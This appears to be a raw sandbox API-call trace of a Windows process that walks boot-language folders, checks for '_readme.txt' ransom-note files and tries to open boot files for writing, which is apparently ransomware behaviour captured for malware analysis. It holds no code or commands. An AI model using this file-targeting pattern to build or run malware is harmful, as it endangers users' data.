[0097.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.271] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1aba640, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1aba640, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.271] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1aba640, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1aba640, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.271] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.271] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0097.271] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.271] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1aba640, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1aba640, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.272] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned=".txt" [0097.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.272] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1aba640, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1aba640, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.272] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.272] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.272] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.274] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0097.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.274] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.274] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.274] PathFindFileNameW (pszPath="") returned="" [0097.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.275] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.275] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.275] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0097.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.275] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.276] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0097.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.276] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0097.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.276] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1ae07a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1ae07a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.276] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0097.276] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.277] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1ae07a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1ae07a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.277] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned=".txt" [0097.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.277] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1ae07a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1ae07a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.277] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.277] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.277] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 